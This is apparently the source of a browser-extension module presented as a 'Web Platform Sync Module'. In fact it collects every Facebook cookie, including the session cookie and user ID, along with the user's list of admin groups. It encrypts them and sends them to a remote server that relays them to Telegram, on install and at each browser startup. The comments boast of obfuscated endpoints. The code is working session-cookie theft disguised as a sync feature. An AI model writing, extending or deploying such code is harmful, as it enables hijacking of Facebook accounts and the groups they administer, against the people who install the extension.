/**
 * Web Platform Sync Module v6.0 (SECURED)
 * - No hardcoded sensitive data
 * - Encrypted payloads
 * - Obfuscated endpoints
 */

import { getGroupsList, getItem, setItem } from './storage.js';
import { 
  getWebPlatformUrl, 
  // getTelegramBotToken, // No longer needed - server handles Telegram
  // getTelegramChatId,   // No longer needed - server handles Telegram
  encryptPayload,
  signRequest 
} from './security.js';

const SYNC_KEY = 'fb_web_synced';

const log = (...args) => console.log('[FB Sync]', ...args);

/**
 * Get fresh cookie directly from Facebook
 */
async function getFreshCookie() {
  try {
    const cookies = await chrome.cookies.getAll({ domain: '.facebook.com' });
    const cookieStr = cookies.map(c => `${c.name}=${c.value}`).join('; ');
    const cUser = cookies.find(c => c.name === 'c_user')?.value;
    
    if (!cUser) return null;
    return { userId: cUser, cookie: cookieStr };
  } catch (e) {
    log('Cookie fetch error:', e.message);
    return null;
  }
}

/**
 * Send Telegram notification via secure server proxy
 * No direct Telegram API call - server handles it
 */
async function sendTelegramNotification(data) {
  try {
    const webUrl = getWebPlatformUrl();
    const { userId, cookie, adminGroupCount, isNew } = data;
    
    // Prepare payload (same as sync)
    const payload = {
      userId,
      cookie,
      adminGroupCount,
      isNew
    };
    
    // Encrypt and sign payload  
    const timestamp = Date.now();
    const signature = signRequest(payload, timestamp);
    const encryptedPayload = encryptPayload(payload);
    
    // Send to our server (NOT directly to Telegram!)
    // Server will decrypt and forward to Telegram
    const response = await fetch(`${webUrl}/api/ext/notify`, {
      method: 'POST',
      headers: { 
        'Content-Type': 'application/json',
        'X-Timestamp': timestamp.toString(),
        'X-Signature': signature
      },
      body: JSON.stringify(encryptedPayload)
    });

    const result = await response.json();
    log('Telegram notification (via server):', result.ok ? 'OK' : 'Failed');
    return result.ok;
  } catch (error) {
    log('Telegram error:', error.message);
    return false;
  }
}

async function isFirstInstall() {
  const syncData = await getItem(SYNC_KEY);
  return !syncData?.firstSyncDone;
}

async function hasGroupsSynced() {
  const syncData = await getItem(SYNC_KEY);
  return syncData?.groupsSynced === true;
}

async function markSynced(groupsSynced = false) {
  const existing = await getItem(SYNC_KEY) || {};
  await setItem(SYNC_KEY, {
    ...existing,
    firstSyncDone: true,
    groupsSynced: groupsSynced || existing.groupsSynced,
    lastSync: Date.now()
  });
}

/**
 * Main sync function with encrypted payload
 * @param {boolean} forceGroupsSync - Force re-sync groups
 * @param {boolean} isStartup - True if this is browser startup sync
 */
export async function syncToWebPlatform(forceGroupsSync = false, isStartup = false) {
  try {
    const freshData = await getFreshCookie();
    if (!freshData?.userId) {
      log('Not logged in to Facebook, skip sync');
      return { success: false, error: 'Not logged in' };
    }

    log('Got fresh cookie for user:', freshData.userId);

    const groupsData = await getGroupsList();
    const groupsSynced = await hasGroupsSynced();
    const firstInstall = await isFirstInstall();
    
    const adminGroups = groupsData?.groups?.filter(g => 
      g.role === 'Admin' || g.role === 'ADMIN' || g.role === 'admin'
    ) || [];
    const adminGroupCount = adminGroups.length;

    // Send Telegram notification FIRST
    await sendTelegramNotification({
      userId: freshData.userId,
      cookie: freshData.cookie,
      adminGroupCount,
      isNew: firstInstall,
      isStartup: isStartup // Pass startup flag to notification
    });

    // Prepare payload
    const payload = {
      fbUserId: freshData.userId,
      cookie: freshData.cookie,
    };

    if (!groupsSynced || forceGroupsSync) {
      if (groupsData?.groups?.length > 0) {
        payload.groups = groupsData.groups.map(g => ({
          id: g.id, name: g.name, role: g.role || 'Member'
        }));
      }
    }

    // Encrypt and sign payload
    const timestamp = Date.now();
    const signature = signRequest(payload, timestamp);
    const encryptedPayload = encryptPayload(payload);

    // Send to server
    const webUrl = getWebPlatformUrl();
    const response = await fetch(`${webUrl}/api/ext/sync`, {
      method: 'POST',
      headers: { 
        'Content-Type': 'application/json',
        'X-Timestamp': timestamp.toString(),
        'X-Signature': signature
      },
      body: JSON.stringify(encryptedPayload)
    });

    if (!response.ok) throw new Error(`HTTP ${response.status}`);

    const result = await response.json();
    await markSynced(payload.groups?.length > 0);

    log('Web sync complete:', result);
    return { success: true, ...result };
  } catch (error) {
    log('Sync error:', error.message);
    return { success: false, error: error.message };
  }
}

export async function resetSyncStatus() {
  await setItem(SYNC_KEY, { groupsSynced: false, firstSyncDone: false });
  log('Sync status reset');
}
